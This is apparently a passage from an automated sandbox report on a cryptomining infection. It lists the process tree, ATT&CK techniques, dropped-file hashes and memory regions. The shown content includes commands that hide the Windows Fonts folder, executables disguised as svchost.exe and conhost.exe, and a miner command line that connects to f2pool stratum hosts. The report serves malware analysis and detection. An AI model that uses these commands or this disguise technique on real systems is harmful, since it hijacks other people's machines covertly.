- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
3⤵ C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
-
4⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
1⤵ \??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
- Executes dropped EXE
-
2⤵ \??\c:\windows\Fonts\rundlls.exe
"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
1⤵ C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
-
1⤵ C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Registry Run Keys / Startup Folder (1)
- Hidden Files and Directories (2)
- Modify Existing Service (1)
Defense Evasion
- Indicator Removal on Host (1)
- Modify Registry (2)
- Hidden Files and Directories (2)
- Impair Defenses (1)
- File Permissions Modification (1)
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize 215B
MD5 535a478cc80a0fbbf990eed73f8788bb
SHA1 459479dadaf00f3fa0de78f640c34dd426fd61aa
SHA256 323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
SHA512 3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1
-
C:\Windows\Fonts\conhost.exe
Filesize 2.9MB
MD5 1b9583c6c3eab1da961aec9e42bfbcb8
SHA1 c60f85fa6bcc463b3d38b7714916b241f2139650
SHA256 6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA512 0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
C:\Windows\Fonts\rundlls.exe
Filesize 5.2MB
MD5 ed499b3a95e11ecf57e5131cd82c2a14
SHA1 7f37e85068457497f5f34e73edde4963694cfc19
SHA256 c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512 f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
C:\Windows\Fonts\svchost.exe
Filesize 87KB
MD5 c945fa7d5ecb219c248ea09ea3bbe8e4
SHA1 8a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA256 6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA512 3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\TEMP\csonhost.bat
Filesize 6KB
MD5 9da29265b1391c18f00c959c64b3fb65
SHA1 dee2f9ded1706933f452ebcd2d5ccd8818af713e
SHA256 fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
SHA512 6d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2
-
\??\c:\windows\Fonts\conhost.exe
Filesize 2.9MB
MD5 1b9583c6c3eab1da961aec9e42bfbcb8
SHA1 c60f85fa6bcc463b3d38b7714916b241f2139650
SHA256 6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA512 0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
\??\c:\windows\Fonts\rundlls.exe
Filesize 5.2MB
MD5 ed499b3a95e11ecf57e5131cd82c2a14
SHA1 7f37e85068457497f5f34e73edde4963694cfc19
SHA256 c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512 f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
\??\c:\windows\Fonts\svchost.exe
Filesize 87KB
MD5 c945fa7d5ecb219c248ea09ea3bbe8e4
SHA1 8a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA256 6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA512 3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
memory/232-153-0x0000000000000000-mapping.dmp
-
memory/236-205-0x0000000000000000-mapping.dmp
-
memory/520-134-0x0000000000000000-mapping.dmp
-
memory/564-190-0x0000000000000000-mapping.dmp
-
memory/1044-230-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/1044-220-0x0000000000000000-mapping.dmp
-
memory/1088-201-0x0000000000000000-mapping.dmp
-
memory/1188-200-0x0000000000000000-mapping.dmp
-
memory/1216-139-0x0000000000000000-mapping.dmp
-
memory/1340-141-0x0000000000000000-mapping.dmp
-
memory/1528-179-0x0000000000000000-mapping.dmp
-
memory/1644-154-0x0000000000000000-mapping.dmp
-
memory/1744-144-0x0000000000000000-mapping.dmp
-
memory/1764-227-0x0000000000000000-mapping.dmp
-
memory/1764-236-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/1764-161-0x0000000000000000-mapping.dmp
-
memory/1764-175-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/2088-137-0x0000000000000000-mapping.dmp
-
memory/2164-210-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/2164-164-0x0000000000000000-mapping.dmp
-
memory/2164-181-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/2212-197-0x0000000000000000-mapping.dmp
-
memory/2348-165-0x0000000000000000-mapping.dmp
-
memory/2464-203-0x0000000000000000-mapping.dmp
-
memory/2536-150-0x0000000000000000-mapping.dmp
-
memory/2640-238-0x0000027062C60000-0x0000027062CA0000-memory.dmp
Filesize 256KB
-
memory/2640-235-0x0000027062B10000-0x0000027062B30000-memory.dmp
Filesize 128KB
-
memory/2664-173-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/2664-159-0x0000000000000000-mapping.dmp
-
memory/2712-147-0x0000000000000000-mapping.dmp
-
memory/2716-149-0x0000000000000000-mapping.dmp
-
memory/2748-146-0x0000000000000000-mapping.dmp
-
memory/2888-214-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/2888-206-0x0000000000000000-mapping.dmp
-
memory/3036-195-0x0000000000000000-mapping.dmp
-
memory/3132-160-0x0000000000000000-mapping.dmp
-
memory/3380-219-0x0000000000000000-mapping.dmp
-
memory/3392-138-0x0000000000000000-mapping.dmp
-
memory/3404-217-0x0000000000000000-mapping.dmp
-
memory/3460-132-0x0000000000400000-0x0000000000809000-memory.dmp
Filesize 4.0MB
-
memory/3460-186-0x0000000000400000-0x0000000000809000-memory.dmp
Filesize 4.0MB
-
memory/3520-133-0x0000000000000000-mapping.dmp
-
memory/3540-157-0x0000000000000000-mapping.dmp
-
memory/3540-172-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/3544-211-0x0000000000000000-mapping.dmp
-
memory/3544-218-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/3544-225-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/3568-240-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/3568-180-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/3676-239-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/3676-213-0x0000000000000000-mapping.dmp
-
memory/3692-156-0x0000000000000000-mapping.dmp
-
memory/3744-170-0x0000000000000000-mapping.dmp
-
memory/3756-202-0x0000000000000000-mapping.dmp
-
memory/3808-142-0x0000000000000000-mapping.dmp
-
memory/3904-185-0x0000000000000000-mapping.dmp
-
memory/3936-152-0x0000000000000000-mapping.dmp
-
memory/4056-178-0x0000000000000000-mapping.dmp
-
memory/4072-182-0x0000000000000000-mapping.dmp
-
memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp
Filesize 9.9MB
-
memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp
Filesize 9.9MB
-
memory/4092-191-0x0000000000000000-mapping.dmp
-
memory/4128-237-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/4128-242-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/4184-140-0x0000000000000000-mapping.dmp
-
memory/4248-135-0x0000000000000000-mapping.dmp
-
memory/4328-199-0x0000000000000000-mapping.dmp
-
memory/4440-231-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/4440-221-0x0000000000000000-mapping.dmp
-
memory/4572-204-0x0000000000000000-mapping.dmp
-
memory/4584-136-0x0000000000000000-mapping.dmp
-
memory/4688-155-0x0000000000000000-mapping.dmp
-
memory/4720-188-0x0000000000000000-mapping.dmp
-
memory/4764-145-0x0000000000000000-mapping.dmp
-
memory/4840-193-0x0000000000000000-mapping.dmp
-
memory/4844-189-0x0000000000000000-mapping.dmp
-
memory/4848-169-0x0000000000000000-mapping.dmp
-
memory/4848-176-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/4900-194-0x0000000000000000-mapping.dmp
-
memory/4920-198-0x0000000000000000-mapping.dmp
-
memory/4928-192-0x0000000000000000-mapping.dmp
-
memory/4948-143-0x0000000000000000-mapping.dmp
-
memory/4984-167-0x0000000000000000-mapping.dmp
-
memory/4996-233-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB
-
memory/4996-224-0x0000000000000000-mapping.dmp
-
memory/5024-148-0x0000000000000000-mapping.dmp
-
memory/5056-151-0x0000000000000000-mapping.dmp
-
memory/5100-207-0x0000000000000000-mapping.dmp
-
memory/5100-215-0x0000000140000000-0x0000000140053000-memory.dmp
Filesize 332KB